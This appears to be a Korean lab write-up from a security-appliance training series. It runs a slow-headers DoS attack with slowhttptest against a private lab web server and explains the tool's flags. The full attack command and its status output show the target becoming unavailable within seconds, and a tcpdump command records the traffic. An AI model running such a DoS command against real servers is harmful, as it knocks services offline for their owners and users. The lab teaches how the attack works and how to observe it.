실습> slowhtptest DoS Attack
툴이 기본으로 Kali Linux 없으므로 apt로 설치한다.
-c 4000: 4000 개의 세션을 연결
-g : 소켓의 변화되는 상태 통계 생성
-o : 보고서 출력 파일 생성
-i : 데이터 전송 간격
-r : 초당 연결하는 세션 개수
-t : GET 방식으로 요청
-x : 바이트 최대 길이
-p : 3초가 흘러도 응답이 없을 때 접속이 불가능하다고 판단
-u : 타겟 URL
Attacker ~# apt-get -y install slowhttptest etherape
Attacker ~# slowhttptest -c 4000 -g -o slowloris -i 10 -r 100 -t GET -x 3 -p 3 -u http://192.168.108.101
Mon Feb 28 07:31:34 2022: set open files limit to 4010
Mon Feb 28 07:31:34 2022:
Mon Feb 28 07:31:34 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:31:34 2022:
slow HTTP test status on 0th second:
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
Mon Feb 28 07:31:39 2022:
Mon Feb 28 07:31:39 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:31:39 2022:
slow HTTP test status on 5th second:
initializing: 0
pending: 161
connected: 168
error: 0
closed: 0
service available: YES
Mon Feb 28 07:31:44 2022:
Mon Feb 28 07:31:44 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:31:44 2022:
slow HTTP test status on 10th second:
initializing: 0
pending: 480
connected: 266
error: 0
closed: 0
service available: NO
Mon Feb 28 07:31:49 2022:
Mon Feb 28 07:31:49 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:31:49 2022:
slow HTTP test status on 15th second:
initializing: 0
pending: 724
connected: 332
error: 0
closed: 0
service available: NO
Mon Feb 28 07:31:54 2022:
Mon Feb 28 07:31:54 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:31:54 2022:
slow HTTP test status on 20th second:
initializing: 0
pending: 1069
connected: 404
error: 0
closed: 5
service available: NO
Mon Feb 28 07:31:59 2022:
Mon Feb 28 07:31:59 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:31:59 2022:
slow HTTP test status on 25th second:
initializing: 0
pending: 1399
connected: 460
error: 0
closed: 36
service available: NO
Mon Feb 28 07:32:04 2022:
Mon Feb 28 07:32:04 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:32:04 2022:
slow HTTP test status on 30th second:
initializing: 0
pending: 1727
connected: 467
error: 0
closed: 116
service available: NO
Mon Feb 28 07:32:09 2022:
Mon Feb 28 07:32:09 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:32:09 2022:
slow HTTP test status on 35th second:
initializing: 0
pending: 2071
connected: 485
error: 0
closed: 172
service available: NO
Mon Feb 28 07:32:14 2022:
Mon Feb 28 07:32:14 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:32:14 2022:
slow HTTP test status on 40th second:
initializing: 0
pending: 2418
connected: 496
error: 0
closed: 236
service available: NO
^C <-- Ctrl + C를 눌러서 중지한다.
Mon Feb 28 07:32:17 2022:
Test ended on 43th second
Exit status: Cancelled by user
CSV report saved to slowloris.csv
HTML report saved to slowloris.html
UTM 내부에서 tcpdump 를 이용해서 패킷을 저장해서 향후에 분석할 수 있다.
UTM# tcpdump -w slowhttptest.pcap port 80
'Linux > 보안장비 운용' 카테고리의 다른 글
| NAT, DR, Tunneling (0) | 2022.03.03 |
|---|---|
| Anti port scan (0) | 2022.03.02 |
| IPS 설정 (0) | 2022.03.02 |
| DMZ WEB#1 서버의 가상 호스트 설정 (0) | 2022.03.02 |
| DNS 서버 설정 (0) | 2022.03.02 |